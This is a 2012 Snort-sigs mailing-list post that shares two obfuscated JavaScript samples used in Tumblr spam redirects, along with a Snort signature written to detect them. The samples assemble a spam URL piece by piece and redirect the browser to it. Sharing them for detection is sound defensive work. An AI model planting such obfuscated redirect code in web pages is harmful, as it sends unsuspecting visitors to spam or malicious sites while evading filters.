[Snort-sigs] Tumblr redirect update

James Lay jlay at ...3266...
Fri Jul 6 11:30:12 EDT 2012


Team,

The bad guys have added an additional method for this from the previous 
version:
var yvkq='http'; var gql='://e'; function vfti(hzo,dpq){return hzo+dpq} 
var ojty=vfti(yvkq,gql);var ujh='card'; var rgl='5-l'; function 
izhm(nac,rww){return nac+rww} var imqv=izhm(ujh,rgl);var fyy='ove'; var 
qptv='r.c'; function rgjdww(zsb,uqi){return zsb+uqi} var 
eavjam=rgjdww(fyy,qptv);var uqv='om/?'; var cew='EUKM'; function 
wlwq(vzm,deb){return vzm+deb} var uelj=wlwq(uqv,cew);var cozw='lNO'; var 
gpp='R'; function zmkh(vkj,mov){return vkj+mov} var peqo=zmkh(cozw,gpp); 
var bzsd=ojty+imqv+eavjam+uelj+peqo; document.location = bzsd

and the new version:
var bwl='htt'; var jwu='p://'; function relz(dgk,cpy){return dgk+cpy} 
var bgbr=relz(bwl,jwu);var daih='ecar'; var zpd='d3-'; function 
eettgr(xyl,too){return xyl+too} var sdiocl=eettgr(daih,zpd);var 
xand='love'; var max='r.co'; function sccfhz(krs,mre){return krs+mre} 
var abbghb=sccfhz(xand,max);var khd='m/?5'; var esd='Mzo'; var 
zcl='GyEy'; function frmy(jxx,sbe,onn){return jxx+sbe+onn} var 
qpyj=frmy(khd,esd,zcl); var otoa=bgbr+sdiocl+abbghb+qpyj; 
document.location = otoa

The below Snort sig should match the previous method and the new one:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT 
Tumblr spam redirect"; flow:from_server; file_data; content:"='htt"; 
content:"://"; within: 15; metadata:policy security-ips drop, service 
http; classtype:bad-unknown; sid:XXXXXXX; reference: 
malwareandmore.blogspot.com/2012/06/tumblr-redirects.html; rev:2;)

Thank you.

James




More information about the Snort-sigs mailing list